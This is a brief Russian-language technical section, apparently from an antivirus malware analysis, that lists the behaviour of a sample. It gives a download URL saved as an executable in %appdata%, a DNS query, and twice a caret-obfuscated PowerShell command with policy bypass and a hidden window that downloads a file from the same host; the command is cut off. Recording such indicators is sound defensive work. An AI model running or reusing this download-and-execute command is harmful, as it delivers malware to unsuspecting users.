Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^ErShE^L^l^.e^Xe -^e^x^e^C^U^tIoNpo^liCY ^BYPasS -nOp^r^ofi^Le^ -^W^i^n^d^owSty^L^E^ H^I^dDEN (New-o^Bje^cT^ ^s^Y^s^tE^m.nE^t^.^we^B^CL^I^Ent).doWNl^oAd^File^('http://newy...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "pOW^ErShE^L^l^.e^Xe -^e^x^e^C^U^tIoNpo^liCY ^BYPasS -nOp^r^ofi^Le^ -^W^i^n^d^owSty^L^E^ H^I^dDEN (New-o^Bje^cT^ ^s^Y^s^tE^m.nE^t^.^we^B^CL^I^Ent).doWNl^oAd^File^('http://newy...' (со скрытым окном)